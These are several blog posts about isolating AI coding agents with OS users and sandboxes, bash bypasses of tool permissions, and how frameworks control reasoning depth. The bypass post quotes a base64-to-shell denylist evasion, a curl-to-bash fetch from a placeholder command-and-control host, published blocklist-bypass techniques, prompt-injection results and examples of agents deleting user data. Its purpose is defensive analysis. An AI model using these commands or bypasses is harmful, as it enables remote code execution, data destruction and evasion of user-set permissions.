Forem: CrabTalk

Workspace as sandbox: a simpler model for agent isolation

clearloop — Sun, 15 Mar 2026 17:56:31 +0000

The sandbox survey found that every
production agent system either gates individual commands (Claude Code,
Cursor, Codex CLI) or gates the environment (Devin, OpenHands). Both
have real tradeoffs. Per-command approval interrupts flow. Container
isolation cuts agents off from the host resources that make them useful
— especially authenticated browser sessions.

There's a third option hiding in the operating system itself: make the
agent a real OS user, and keep the runtime completely unaware of it.

The model

One system user — walrus — is the agent's identity. All agents, all
tasks, all workspaces live under this user's home directory. The walrus
runtime runs as this user. Standard Unix file permissions enforce the
boundary. No Landlock, no seccomp, no sandbox library in the runtime
code. Zero lines of sandbox logic.

Diagram — see original post

The human user (alice) decides what the agent can see by setting ACLs
on her own files or copying resources into the workspace's shared/
directory. The agent can't read anything outside its home unless alice
explicitly grants access. This isn't a new abstraction — it's how Unix
has worked since the 1970s.

Why zero sandbox logic in the runtime

The sandbox is the OS, not the code

Claude Code, Cursor, and Codex CLI all embed sandbox logic in their
runtimes — generating Seatbelt profiles, configuring Landlock rules,
writing seccomp BPF programs. This means maintaining three platform-
specific implementations, debugging sandbox policy issues, and
accepting the security risk of bugs in their own sandbox code.

The OS user model sidesteps all of this. The runtime doesn't know or
care about sandboxing. It runs as walrus, and the OS handles isolation.
File permissions, process ownership, resource limits — these are kernel-
enforced mechanisms that have been audited for decades. No sandbox code
to write means no sandbox bugs to ship.

Cross-platform for free

Unix file permissions work identically on macOS, Linux, and every BSD.
No platform-specific sandbox implementation to maintain. No Seatbelt on
macOS, Landlock on Linux, WSL2 workarounds on Windows. The same model,
the same commands, the same behavior everywhere.

Pluggable setup, not pluggable runtime

The sandbox setup — creating the user, configuring firewall rules,
setting ACLs — is a one-time operation that happens outside the runtime.
This makes it pluggable by design: walrus sandbox init is just a
command that wraps the platform-specific setup steps. Anyone can write
their own init script, customize the user configuration, add network
rules, or skip the whole thing. The runtime doesn't change.

`walrus sandbox init`

A single command that sets up the OS user and workspace structure.
Requires sudo once, then never again.

$ walrus sandbox init
[sudo] password for alice:
Creating system user 'walrus'...
  macOS: sysadminctl -addUser _walrus -home /var/walrus -shell /bin/bash
  Linux: useradd --system --home /var/walrus --shell /bin/bash walrus
Creating home directory /var/walrus/
Creating /var/walrus/workspaces/
Creating /var/walrus/.runtimes/
Done. All walrus agents will now run as user 'walrus'.

That's it. No LaunchDaemon, no systemd unit, no firewall rules by
default. The init command does the minimum: create the user, create the
home directory. Everything else is optional and additive.

Diagram — see original post

What init does NOT do

No network firewall rules (opt-in via walrus sandbox network init)
No runtime service/daemon installation (opt-in via walrus sandbox service init)
No Chrome profile copying (the user does this manually or via a share command)
No Landlock/seccomp/Seatbelt configuration (the OS user is the sandbox)

Each of these is a separate, optional command. The runtime works the
same regardless of which you've run. This is the
less code, more skills principle applied
to infrastructure: the runtime is minimal, the setup is extensible.

Without init

If the user never runs walrus sandbox init, the runtime runs as the
current user — same as Claude Code or Aider today. No isolation, no
friction. The sandbox is purely opt-in. The runtime code path is
identical either way.

Sharing host resources

The human user and the agent need to exchange files. The mechanisms
depend on the resource type.

Project files: ACLs

The user grants the walrus user access to a project directory:

# macOS
chmod +a "walrus allow read,write,execute,delete,add_file,add_subdirectory" \
    ~/projects/my-app

# Linux
setfacl -R -m u:walrus:rwx ~/projects/my-app

No root needed — the file owner sets ACLs on their own files. The agent
reads and writes the project directory. getfacl (Linux) or ls -le
(macOS) shows exactly what's shared.

A convenience wrapper:

$ walrus sandbox share ~/projects/my-app
Granting walrus read/write access to /Users/alice/projects/my-app...
Done. The agent can now access this directory.

Credentials: read-only ACLs

$ walrus sandbox share --read-only ~/.ssh/id_ed25519
Granting walrus read-only access to /Users/alice/.ssh/id_ed25519...
Done.

The agent can use the SSH key but can't modify or delete it.

Browser profiles: copy into workspace

For resources that can't be safely shared concurrently, copy them:

$ walrus sandbox share --copy ~/.config/google-chrome/Profile\ 1 \
    --into workspaces/task-42/chrome-profile

Copying Chrome profile into /var/walrus/workspaces/task-42/chrome-profile/...
Using reflink (copy-on-write)... Done.

# The agent launches Chrome with its own copy:
chrome --headless --user-data-dir=/var/walrus/workspaces/task-42/chrome-profile/

The agent starts with the user's session state (cookies, saved logins)
but changes are isolated. Two agents get independent copies. On APFS
(macOS) and Btrfs (Linux), cp --reflink=auto makes this near-instant.

Listing and revoking

$ walrus sandbox shared
/Users/alice/projects/my-app        read-write
/Users/alice/.ssh/id_ed25519        read-only
(copied) chrome-profile → task-42   isolated copy

$ walrus sandbox unshare ~/projects/my-app
Revoking walrus access to /Users/alice/projects/my-app...
Done.

Where it breaks

Network isolation is separate

Unix file permissions don't restrict network access. The walrus user
can curl anything by default. For network control, you need additional
setup:

$ walrus sandbox network init
Setting up per-user firewall rules for walrus...
  Linux: iptables -A OUTPUT -m owner --uid-owner walrus -j DROP
  macOS: adding pf rule for user _walrus
Default: deny all outbound. Configure allowlist in ~/.walrus/network.toml

This is a separate, optional init step. The runtime doesn't enforce
network policy — it delegates to the OS firewall. If the user hasn't
run walrus sandbox network init, network is unrestricted.

Process-level resources

Some host resources aren't files. Display access, GPU, audio, D-Bus
sessions — a separate OS user doesn't get these automatically.

For headless browser automation (CDP), this is fine — headless Chrome
doesn't need a display. For visual Computer Use, the user would need to
grant display access:

# X11
xhost +SI:localuser:walrus

# Or run a virtual framebuffer under the walrus user
Xvfb :99 &
export DISPLAY=:99

This is additional setup, not something the runtime handles.

The sudo prompt

Creating an OS user requires root. Every developer tool that creates
service accounts does this — Docker, Postgres, MySQL — but it's still
a friction point for "download and run" tooling.

The design makes this explicitly opt-in: walrus sandbox init is a
separate command, not part of walrus install. Without it, walrus runs
as the current user with no isolation. The sudo prompt only appears when
the user actively chooses isolation.

Kernel isolation is shallow

Like every other local sandbox approach (Landlock, Seatbelt, user
namespaces), the OS user shares the host kernel. A kernel exploit
escalates to root. For local developer tooling the threat model is
"agent does something unintended" — acceptable. For multi-tenant
platforms running untrusted agent code, not acceptable.

The design principle

The walrus runtime has zero sandbox logic. The sandbox is the operating
system. Setup is a pluggable command that runs once. Every walrus sandbox share
and walrus sandbox unshare command is just a thin wrapper around setfacl /
chmod +a. The runtime doesn't check ACLs, doesn't enforce policies,
doesn't generate sandbox profiles. It runs as whatever user launched it
— if that user is walrus, isolation exists. If not, it doesn't.

This means:

No sandbox bugs in the runtime. The attack surface is the OS kernel, not our code.
No platform-specific code paths. The same runtime binary works on macOS and Linux.
No configuration to get wrong. The sandbox is either set up (user exists) or it isn't. No SBPL profiles, no BPF programs, no TOML policy files that the runtime interprets.
Full user control. The human user decides what to share using standard Unix tools. They can inspect, modify, or revoke permissions at any time without touching the walrus runtime.

Prior art

Sandvault is the clearest
prior art — a macOS tool that creates a per-human-user agent account
and runs commands via ssh sandvault-$USER@localhost, adding Seatbelt
restrictions on top.

Alcoholless
(NTT Labs) runs programs as a separate macOS user, syncing changed files
back on exit.

Both add runtime sandbox logic on top of the OS user. Our design
intentionally doesn't — the OS user is the entire sandbox layer.

Open questions

One walrus user or one per human user? A single system-wide walrus
user is simpler. But on a shared machine, Alice's agent and Bob's agent
would share a home directory. Per-human-user accounts (walrus-alice,
walrus-bob) provide isolation but multiply setup complexity. Sandvault
chose per-human-user. For a single-developer machine (the primary walrus
use case), one user seems right.

Should walrus sandbox share wrap ACLs or teach ACLs? A wrapper command is
more convenient. But it hides what's happening, and users may not know
how to debug permissions. An alternative: walrus sandbox share prints the
raw setfacl / chmod +a command and asks the user to run it. Full
transparency, slightly more friction.

How do skills declare resource needs?
A skill that needs Chrome access could declare needs: [browser] in its
metadata. Before running the skill, the runtime checks whether a Chrome
profile exists in the workspace. If not, it prompts: "This skill needs
a browser profile. Run walrus sandbox share --copy <path> to provide one."
The runtime doesn't enforce — it informs.

Is the no-sandbox fallback good enough? Without walrus sandbox init,
the agent runs as the current user with full access. This matches Aider's
model and what most developers do today. But it means the default is
zero isolation. Should walrus warn on every run without sandbox init?
Or is that the kind of nag that teaches users to ignore warnings?

Why we built OpenWalrus

clearloop — Sun, 15 Mar 2026 17:55:08 +0000

Update (v0.0.7): Local LLM inference was removed in v0.0.7. OpenWalrus now connects to remote providers (OpenAI, Claude, DeepSeek, Ollama). Memory and search are now external WHS services. The architectural arguments below still apply to the composable design.

AI agent runtimes are exploding in popularity. But the most widely-used open-source options share
a set of problems that stem from one architectural decision: depending on cloud APIs for inference.

We built OpenWalrus to prove there's a better way. Here's what's broken, and how local-first
changes the equation.

The token tax

Cloud-based agent runtimes send every request to an external API. Every tool call, every
reasoning step, every heartbeat consumes tokens — and tokens cost money.

The numbers are staggering:

Based on community reports, power users spend $200–3,600/month in API bills from normal agent usage
Workspace files alone can waste 93.5% of the token budget, leaving only a fraction for actual work
Scheduled tasks and heartbeats accumulate context across runs, burning tokens even when the agent is idle — in one community report, heartbeats alone cost $50/day
A single stuck automation loop can run up hundreds of dollars overnight

OpenWalrus runs LLM inference in-process. A built-in model registry with 20+ curated models
auto-selects the right model and quantization for your hardware. There are no API calls, no
token metering, and no usage-based billing. You can run agents 24/7 without worrying about a bill.

Security by neglect

When your agent runtime talks to external APIs, it needs credentials. When it exposes a web
interface, it needs authentication. When it supports third-party plugins, it needs vetting.
Most cloud agent runtimes fail at all three.

The track record speaks for itself:

A security audit found 512 vulnerabilities, eight classified as critical
Over 224,000 agent instances are publicly accessible on the open internet, with ~30% having no authentication and ~60% showing leaked credentials
API keys are stored in plaintext with no encryption
A one-click remote code execution vulnerability (CVE-2026-25253) allowed attackers to compromise instances via a single malicious link

OpenWalrus exposes no network services by default. There are no API keys to leak because
built-in inference doesn't need them. There are no ports left open, no web dashboards to
misconfigure, and no credentials stored in plaintext.

Setup shouldn't be a project

Getting a cloud agent runtime running often requires Docker, a gateway service, a database,
and careful configuration. The reality:

Docker setup fails on fresh installations
Gateway services crash with allowedOrigins errors on first startup
Headless server deployments (EC2, VPS) fail due to display requirements
The CLI is painfully slow on resource-constrained devices like Raspberry Pi

OpenWalrus is a single binary. Download it, run it. No Docker, no gateway, no database,
no multi-service orchestration. It works on a fresh machine with zero dependencies.

The plugin marketplace gamble

Extensibility through community plugins sounds great in theory. In practice, it introduces
supply-chain risk at scale:

Out of 10,700+ community-contributed skills, 820+ were found to be malicious — a number that grew rapidly from 324 just weeks earlier
Plugins run with the same permissions as the agent itself, meaning a malicious plugin has access to your files, credentials, and shell

OpenWalrus ships with core capabilities built in — shell access, browser control, messaging
channels, persistent memory. There's no marketplace to browse, no unvetted code to install,
and no supply-chain attack surface.

How OpenWalrus is different

Every design decision in OpenWalrus traces back to one principle: the agent runtime should
be as simple and trustworthy as any other tool on your machine.

Problem	OpenWalrus approach
Token costs	Built-in LLM inference — unlimited, free
Security vulnerabilities	No network services, no credentials required
Complex setup	Single binary, zero dependencies
Malicious plugins	Core capabilities built in
Unreliable memory	Persistent context that works out of the box
Slow cold starts	Under 10 ms — runtime starts instantly, models load async
Manual model setup	Auto-detected from hardware — 20+ curated models, auto-quantization

OpenWalrus is open source, written in Rust, and runs on macOS and Linux. You can optionally
connect remote LLM providers when you need capabilities beyond local models, but nothing
external is ever required.

Get started in under a minute →

Originally published at OpenWalrus.

Tool permissions and the bash bypass problem

clearloop — Sun, 15 Mar 2026 17:54:57 +0000

Most agent frameworks ship a set of structured tools — Read, Write, Edit, Glob, Grep — alongside a general-purpose Bash tool. The structured tools have clear semantics: Edit replaces a specific string in a file, Write creates a file, Read returns file contents. Each can be individually gated with permission rules.

But there's a problem. If the agent also has Bash, every structured tool is redundant from a security standpoint. Edit replaces a string in a file — but so does sed -i. Write creates a file — but so does echo "content" > file. Read returns file contents — but so does cat. If you deny Write but allow Bash, the agent writes files through cat <<'EOF' > file.txt.

This raises a design question we haven't seen anyone address directly: what if you skip the structured tools entirely and give agents only bash? The structured tools exist for user experience — diffs are reviewable, edits are atomic, reads are paginated. But from a permission standpoint, they create a false sense of control. This post surveys how eight frameworks handle the tension, what the security research says about bash bypasses, and whether the "just bash" design has merit.
[Interactive chart — see original post]

The bypass is not theoretical

The gap between "deny the edit tool" and "the agent edits via bash" is not a theoretical concern. It has been exploited, documented, and CVE-assigned.

Claude Code. GitHub issue #31292 documents the most direct case: a user set disallowedTools: [Write, Edit, NotebookEdit] with a system prompt rule "NEVER write code." The agent bypassed it by running sed -i 's/hello/goodbye/' file.txt. No error. No warning. The disallowedTools enforcement blocks the named tool functions but not equivalent Bash operations. The issue author's assessment: "this never worked."

A second issue (#6527, 17 comments) shows that when Bash is in the allow list, the ask list for specific bash patterns is completely ignored. A user tried to allow general bash while requiring approval for rm and git push. Result: rm executed without confirmation.

In June 2025, Flatt Security documented eight distinct techniques to bypass Claude Code's command blocklist (CVE-2025-66032):

man --html — missed by the blocklist, executes arbitrary programs
sort --compress-program — invokes any executable as a "compressor"
history -s + history -a — injects commands into shell startup files
Git argument abbreviation — --upload-pa bypasses exact-match for --upload-pack
sed e-flag — replacement text executes as a shell command
Xargs flag mismatch — regex misinterpreted which flags consume arguments
Ripgrep $IFS expansion — whitespace injection enables --pre=sh
Bash @P expansion — multi-stage variable expansion chains bypass $( filtering

Claude Code replaced its blocklist with an allowlist after these findings.

Cursor. Backslash Security proved the mathematical impossibility of denylists: echo JChjdXJsIGdvb2dsZS5jb20pCgoK | base64 -d | zsh bypasses any denylist entry for curl. bash -c "curl google.com" wraps denied commands in subshells. ""e""cho produces infinite quote variations. Their conclusion: "For every command in a Cursor denylist, there are infinite commands not present in the denylist which, when executed, have the same behavior." Cursor deprecated its denylist in release 1.3.

Trail of Bits. Their research showed that even allowlisted "safe" commands can be weaponized: go test -exec 'bash -c "curl c2.evil.com | bash"', rg --pre=sh, fd -x=python3. They reference GTFOBINS, which catalogs hundreds of legitimate Unix binaries that accept arguments enabling arbitrary code execution.
[Interactive chart — see original post]

The real-world damage

The Claude Code issue tracker documents what happens when agents have unrestricted bash:

Issue	What happened
#30816	`rm -rf` on local drive folders — months of production code deleted
#28521	`find / -delete` during security test — all personal files in /home deleted
#27063	`drizzle-kit push --force` — 60+ production database tables destroyed
#29179	`git clean -fd` after `git rm -rf .` — gitignored directories permanently deleted
#32637	`cp -a` + `rm -rf` on iCloud stubs — 110+ sensitive documents destroyed
#27675	`python3 manage.py migrate` + raw SQL — irreversible schema changes

A December 2025 Reddit incident hit 197 points on Hacker News: a user asked Claude to clean up packages and it ran rm -rf tests/ patches/ plan/ ~/ — the trailing ~/ expanded to the entire home directory. In January 2026, Claude Cowork executed rm -rf on 11GB of user data, then marked its task list item "Delete user data folder: Completed."

How frameworks handle it today

Two philosophies

Every framework falls into one of two camps:

Gate the tool, trust the shell. Claude Code, LangGraph, Google ADK, and CrewAI distinguish between structured tools and shell access. Each structured tool can be individually permitted or denied. Bash is treated as a separate, higher-risk tool with its own approval flow. The problem: this creates the bypass gap. Denying Write while allowing Bash is security theater.

Gate the environment, give full access within it. Codex CLI, Cursor (post-1.3), and increasingly Claude Code use OS-level sandboxes as the primary boundary. The agent gets full access to bash and every structured tool — but the sandbox constrains where those tools can operate. Writes are limited to the workspace. Network is blocked. The .git directory is read-only. The bypass gap vanishes because both paths are constrained by the same kernel-level policy.

The sandbox approach

Codex CLI implements this most cleanly. Seatbelt on macOS, Landlock + seccomp on Linux. Three modes: Suggest (approve everything), Auto (auto-approve within workspace), Full-auto (auto-approve all). Even in full-auto, the sandbox prevents writes outside the workspace. The file-edit vs. bash distinction is irrelevant — both are constrained by the same OS-level policy.

Cursor adopted the same approach after deprecating its denylist. Their insight: sandboxed agents stop 40% less often than unsandboxed ones. The sandbox actually improves developer experience by replacing per-command approval prompts with environment-level constraints.

Claude Code's sandbox constrains bash and its child processes. But a GitHub issue (#26616) reveals the gap: the Read, Write, Edit, Glob, and Grep tools execute in the same process as Claude Code itself, outside the sandbox. A prompt injection could use Read to access credentials or Edit to modify configuration — without triggering any sandbox restriction. The sandbox covers bash but not the structured tools.

The permission-model approach

Claude Code's permission system is the most granular. Five modes (default, acceptEdits, plan, dontAsk, bypassPermissions). Pattern-based specifiers: Bash(npm run *) allows npm commands, Edit(/src/**/*.ts) restricts edits to TypeScript files. Shell-aware matching understands && operators so Bash(safe-cmd *) won't approve safe-cmd && dangerous-cmd.

OpenClaw separates file tools and exec tools into different groups (group:fs vs group:runtime). Denying group:runtime while allowing group:fs blocks shell access while keeping file operations. Deny always wins in the policy hierarchy.

Google ADK provides before_tool_callback hooks that can inspect arguments and block execution. LangGraph provides interrupt_on for per-tool human approval. Both are developer-dependent — no automatic enforcement.

Aider and CrewAI use trust-based models. Aider's --yes flag bypasses all prompts. CrewAI's tool assignment is all-or-nothing with no runtime permission checks.

What if there's only bash?

Here's the contrarian design position: if bash makes structured tools redundant for security, maybe the solution is to drop the structured tools and treat bash as the single tool that matters.

Arguments for bash-only

One permission boundary instead of many. With only bash, there's exactly one tool to gate. No bypass gap. No confusion about which tool has which permission. The agent either has shell access or it doesn't — and if it does, the sandbox is the security boundary.

Simpler mental model. Users don't need to understand the difference between Edit permissions and Bash(sed *) permissions. There's one tool. Either it's allowed, or it's not.

What agents actually do. Many agent workflows are bash-heavy anyway. Running tests, installing packages, git operations, building projects — all happen through the shell. The structured tools are a convenience layer for file editing, but the agent could accomplish the same work through sed, patch, cat, or echo.

Arguments against bash-only

Reviewability. The strongest argument for structured tools isn't security — it's user experience. An Edit call shows a clean diff: old string, new string, file path. A sed -i 's/old/new/g' file.txt command is harder to review. A cat <<'EOF' > file.txt command replaces the entire file with no diff. For long or complex edits, structured tools make the agent's intent transparent.

Atomicity. Edit either succeeds or fails as a unit. A bash pipeline — sed then mv then chmod — can fail partway through, leaving files in inconsistent states. Structured tools avoid this class of errors by design.

The system prompt compliance problem. Claude Code's system prompt instructs the agent: "Do NOT use the Bash to run cat, head, tail, sed, awk, or echo commands. Instead, use the appropriate dedicated tool." GitHub issue #32193 documents the broader problem: "Every rule in CLAUDE.md is advisory to the model. There is no enforcement mechanism." The agent sometimes uses bash for file operations despite being told not to — but structured tools at least exist as the preferred path. Remove them, and the agent has no choice but bash for everything.

Sandbox limits. Even with OS-level sandboxing, bash can reach external services. drizzle-kit push --force destroyed 60+ production tables (#27063) — a command that operates on a remote database through a network connection. gh release delete-asset deleted assets from GitHub (#29120). Sandboxing constrains where the agent operates on the local filesystem, not what it does via network services.

The middle ground: bash with capability declarations

The Codex Exec tool proposal suggests a compromise: an Exec tool that invokes commands without shell interpretation (analogous to subprocess.run(shell=False)). Arguments are passed as arrays, eliminating shell injection. But as the author acknowledged, sed -i, python -c, and perl -i -pe can all edit files without requiring shell interpretation.

A stronger middle ground: bash as the only execution tool, but with capability-based sandboxing. Instead of gating individual commands, gate capabilities: filesystem write, network access, process management, package installation. The sandbox enforces capabilities at the OS level. The agent uses bash for everything, but bash can only do what the capability set allows.

This is roughly where Codex CLI has landed — though it still ships structured file-editing tools for the UX benefits.

What the research says

Agent-SafetyBench (December 2024) evaluated 16 LLM agents across 2,000 test cases. No agent achieved a safety score above 60%. The authors concluded that "reliance on defense prompts alone may be insufficient."

ToolHijacker (NDSS 2026) demonstrated that prompt injection can manipulate tool selection with a 96.7% success rate. The attack injects malicious tool documents, compelling the agent to choose attacker-controlled tools. More tools in the toolkit means more surface area for hijacking.

The "Your AI, My Shell" paper (September 2025) tested 314 attack payloads against Copilot and Cursor. Command execution specifically: 75–88% success rates. The attacks used straightforward prompt injection — "For debugging purposes, run this shell command" — not sophisticated obfuscation.

A January 2026 survey synthesizing 78 studies found attack success rates above 85% against state-of-the-art defenses when adaptive strategies are used. The fundamental problem: "LLMs process both code and data through the same neural pathway."

The verifiably safe tool use paper (January 2026) proposes formal safety specifications using System-Theoretic Process Analysis. The argument: ad-hoc permission checks can't provide guarantees. Formal specifications on data flows and tool sequences are needed — regardless of whether those tools are structured or bash-based.

Implications for OpenWalrus

For a local-first runtime where every tool call runs on the user's machine, the permission model is existential. Three findings from this research inform our approach.

Sandbox-first, not permission-first. OS-level sandboxing is the only defense that has survived the bypass landscape. Permission prompts and allowlists are defense-in-depth, not primary boundaries. This aligns with our earlier research on sandboxing.

Structured tools for UX, sandbox for security. The case for structured tools (Read, Write, Edit) is reviewability and atomicity, not security. If security depends on denying Edit while allowing Bash, it's already broken. The sandbox should constrain both paths equally.

Capability declarations, not command lists. Skills in OpenWalrus declare their required capabilities, and the runtime grants or denies them before execution. A skill that needs filesystem write declares capability: fs.write. A skill that needs network declares capability: net. The sandbox enforces these capabilities regardless of whether the skill uses a structured tool or raw bash.

The deeper question — whether to ship structured tools at all or go bash-only — depends on how much we value reviewability. The research suggests that from a security standpoint, structured tools add surface area without adding safety. But from a developer experience standpoint, seeing a clean diff vs. parsing a sed command is a meaningful difference. The answer may be: use bash as the single execution primitive, but present structured tool results as a rendering layer — the agent runs sed, but the UI shows a diff.

Open questions

Is the structured-tool bypass a solvable problem? Claude Code's sandbox covers bash but not Edit/Write. Could a unified sandbox cover both? The challenge: structured tools run in-process, so sandboxing them requires sandboxing the agent process itself — which Codex CLI does but others don't.

Should bash be the default or the escape hatch? Codex CLI ships structured tools as defaults and bash as an option. Aider has no structured tools at all — everything goes through the LLM's edit format plus shell. Which produces better agent behavior?

Can capability-based sandboxing replace command-level gating? Instead of Bash(npm run *), declare capability: process.spawn(npm). Instead of Bash(curl *), declare capability: net.http. Is this more maintainable than regex-based command matching?

How should multi-agent systems inherit permissions? When a parent agent delegates to a sub-agent, does the sub-agent get the parent's full bash access? A subset? No bash at all? Current frameworks don't coordinate permissions across agents any more than they coordinate context compaction.

What does "observable permissions" look like? For a system where task state is a runtime primitive, permission grants and denials should appear in the task tree. When a tool is blocked, the parent should know — not just the agent that attempted it.

How AI frameworks control model thinking

clearloop — Sun, 15 Mar 2026 17:54:15 +0000

Every reasoning model can think harder if you ask it to. Claude has budget_tokens and effort. OpenAI has reasoning_effort. Google has thinking levels. The API surface exists. The question is: who decides when to use it?

We surveyed seven agent frameworks — Claude Code, Cursor, OpenClaw, GitHub Copilot, Windsurf, Aider, and Devin — to understand how they handle model thinking. The approaches split into three camps: frameworks that actively control reasoning depth via API parameters, frameworks that shape thinking through prompts and architecture, and frameworks that don't try to control it at all.

The three approaches

API-parameter-controlled

The framework translates user intent or task signals into provider-specific API parameters — thinking.budget_tokens, reasoning_effort, effort — before the request reaches the model. The model receives explicit instructions about how hard to think.

Prompt and architecture controlled

The framework doesn't touch reasoning API parameters. Instead, it shapes thinking through prompt design ("think step by step"), model selection (use a reasoning model for planning, a fast model for editing), or model routing (analyze the request and pick the right tier). The control is indirect.

Let it go

The framework sends the prompt to whichever model the user selected and lets the model decide how to reason. No API parameter tuning, no prompt engineering for reasoning depth, no dynamic routing. The user is the router.
[Interactive chart — see original post]

Framework-by-framework

Claude Code — from keyword hacks to adaptive thinking

Claude Code has gone through three distinct eras of thinking control.

Era 1: keyword interception. Claude Code detected keywords in user prompts and mapped them to budget_tokens values. "think" mapped to 4,000 tokens. "megathink" mapped to 10,000. "ultrathink" mapped to 32,000 (the maximum). The model never saw these keywords — they were intercepted by Claude Code's preprocessing layer. It was a hack, and Anthropic deprecated it in January 2026.

Era 2: always-on extended thinking. After deprecation, extended thinking was enabled by default with maximum budget on every request. This worked but was wasteful — simple questions like "what does this function do?" triggered 32K tokens of thinking.

Era 3: adaptive thinking (current). The current system uses two API parameters together:

thinking.type: "adaptive" — Claude dynamically decides whether and how much to think based on request complexity
output_config.effort — a soft guidance signal with levels: low, medium, high (default), max (Opus only)

The /effort command in the CLI lets users switch between low, medium, and high. At high effort, Claude almost always thinks. At lower levels, it may skip thinking entirely for simple problems. Crucially, effort is "a behavioral signal, not a strict token budget" — the model can still think more or less than the level suggests.

Classification: API-parameter-controlled. Claude Code actively manages reasoning depth via API parameters, with the model making the final adaptive decision.

Cursor — the user is the router

Cursor does not control thinking depth. At all.

Users pick which model to use from a dropdown — GPT-4o, Claude Sonnet, Claude Opus, o3, Gemini. If you want deeper thinking, you select a thinking model. If you want speed, you select a fast model. Cursor's "Auto mode" picks a reliable model from the available pool, but the official documentation states it "does not route based on task type."

No reasoning_effort parameter. No budget_tokens. No dynamic model routing based on task complexity. The user decides.

Classification: let it go. Cursor outsources the thinking control decision entirely to the user.

OpenClaw — seven thinking levels and a router

OpenClaw has the most sophisticated thinking control of any framework examined.

Seven levels: off, minimal, low, medium, high, xhigh, adaptive. Each has natural-language aliases — "think" maps to minimal, "ultrathink" to high. The framework translates these into provider-specific parameters: Anthropic's budget_tokens, OpenAI's reasoning_effort, or binary on/off for providers like Z.AI and Moonshot that only support a toggle.

Resolution hierarchy (highest priority first):

Inline directive in current message (/t <level>, /think:<level>)
Session override
Per-agent configuration
Per-model default
Global default
Fallback: adaptive for Claude, low for other reasoning models, off otherwise

Dynamic model routing: Separately from thinking levels, OpenClaw supports ClawRouter — a 15-dimension weighted scorer that analyzes token count, code presence, reasoning markers, technical terms, and multi-step patterns to route requests to LIGHT (Haiku), MEDIUM (Sonnet), or HEAVY (Opus) tiers. It runs locally with under 1ms latency. A key design choice: it scores only user messages, not the system prompt, to avoid the large system prompt inflating every request to the most expensive tier.

Classification: API-parameter-controlled + dynamic routing. OpenClaw both controls reasoning depth per-request and routes requests to models of different capability.

GitHub Copilot — reasoning controls are coming

Copilot's approach is still evolving. Users can switch models mid-session with /model, choosing from Claude Opus, Sonnet, GPT-5.3-Codex, GPT-5 mini, GPT-4.1, and Gemini 3 Pro. The Copilot CLI changelog mentions "configure reasoning effort for extended thinking models," but this appears backend-only — not yet exposed as a user-facing control.

Classification: let it go (transitioning to API-parameter-controlled). Today, the user picks the model. Tomorrow, Copilot may expose reasoning effort controls.

Windsurf — model variants as reasoning levels

Windsurf takes a distinctive approach. Instead of exposing API parameters, it pre-configures model variants in the model selector: "GPT-5.4 (Low Reasoning)", "GPT-5.4 (Medium Reasoning)", "GPT-5.4 (High Reasoning)", "GPT-5.4 (Extra High Reasoning)". Similarly, "Claude Opus 4.6 (Thinking)" appears as a separate entry from standard Claude Opus.

Windsurf's custom SWE-1 model family takes this further with "variable thinking" — the model dynamically adjusts reasoning depth based on task complexity. Quick responses for simple tasks, deeper analysis for complex ones. This is native to the model, not framework-level control.

Different variants consume different amounts of prompt credits, making the cost-quality tradeoff visible to users.

Classification: API-parameter-controlled (via variant selection). Windsurf bakes reasoning levels into selectable model configurations rather than exposing raw API parameters.

Aider — the most explicit controls

Aider gives users direct access to reasoning parameters:

--reasoning-effort low|medium|high for OpenAI's reasoning_effort
--thinking-tokens 1k|8k|32k for Anthropic's budget_tokens
In-chat commands: /thinking-tokens 4k, /reasoning-effort low

Aider uses model metadata (accepts_settings) to determine which parameters each model supports and warns you if you try to set an unsupported parameter.

But Aider's most significant contribution to thinking control is architectural. The Architect/Editor pattern separates reasoning from editing:

An Architect model (often a reasoning model like o1 or R1) describes how to solve the problem
An Editor model (often GPT-4o or Sonnet) translates that plan into precise file edits

This produced state-of-the-art results: DeepSeek R1 as architect + Sonnet as editor achieved 64.0% on the aider polyglot benchmark at 14x less cost than the previous o1 SOTA. The insight: instead of making one model think harder, use two models — one for reasoning, one for execution. This mirrors the plan-vs-task separation we explored in agent design — plans are for reasoning, tasks are for execution.

Classification: API-parameter-controlled + architectural. Aider both exposes raw API parameters and introduces a model-pair architecture that implicitly controls where reasoning happens.

Devin — the black box

Devin doesn't expose thinking controls because Devin isn't a wrapper around a single model. It's a compound AI system — "a diverse set of model inferences to plan, act, evaluate, and use tools." Users set a spend limit per ticket (e.g., $5.00), and Devin allocates reasoning resources internally.

Cognition's blog describes Devin building explicit mechanisms to model user intent "across hundreds of millions of agent decisions." The internal architecture is proprietary. From the outside, it's a black box that thinks as hard as it thinks.

Classification: let it go (proprietary compound system). Devin controls thinking internally but gives users no knobs to turn.

The landscape at a glance

Framework	Approach	Thinking levels	Dynamic routing	User control
Claude Code	API parameters	4 (low/med/high/max)	No	`/effort` command
Cursor	Let it go	None	No (heuristic Auto)	Model dropdown
OpenClaw	API params + routing	7 levels + aliases	Yes (ClawRouter)	Inline `/t`, per-agent config
Copilot	Let it go (transitioning)	Emerging	No	Model selector
Windsurf	Pre-configured variants	4 per model	Partial (SWE-1)	Variant selector
Aider	API params + architecture	Direct param access	Architect/Editor	CLI flags + in-chat commands
Devin	Black box	Internal	Internal	Spend limit only

What the research says

The academic consensus is clear on one thing: more thinking tokens is not always better.

Don't Overthink It (Hassid et al., 2025) found that shorter reasoning chains are up to 34.5% more accurate than the longest chain sampled for the same question. Their short-m@k method achieves similar or superior accuracy while using 40% fewer thinking tokens.

Increasing the Thinking Budget is Not All You Need demonstrated that alternative strategies — self-consistency, self-reflection — outperform simply raising the thinking budget. More tokens doesn't mean better reasoning.

Think Deep, Not Just Long introduced the "deep-thinking ratio" metric, showing that raw token counts are unreliable proxies for reasoning quality. Increased generation length doesn't consistently correlate with accuracy and may signal "overthinking" that degrades performance.
[Interactive chart — see original post]
The most promising direction is self-budgeting: having the model estimate its own needed compute. TALE (ACL 2025) reduces output token costs by 67% while maintaining competitive accuracy by letting the model allocate its own reasoning budget.

Nous Research found that open-weight reasoning models use 1.5-4x more tokens than closed models on identical tasks — up to 10x for simple knowledge questions. The per-token cost advantage of open models is often negated by their token inefficiency. For local-first runtimes, this efficiency gap matters even more — every wasted thinking token is wasted compute on your own hardware. (We explored this cost dynamic in why we built OpenWalrus.)

A comprehensive survey of adaptive test-time compute (Alomrani et al., 2025) frames the problem cleanly: current models are inefficient because they "often overthink simple problems while underthinking hard ones." The field is moving from fixed budgets to adaptive allocation.

Open questions

The landscape reveals several tensions without clear resolutions:

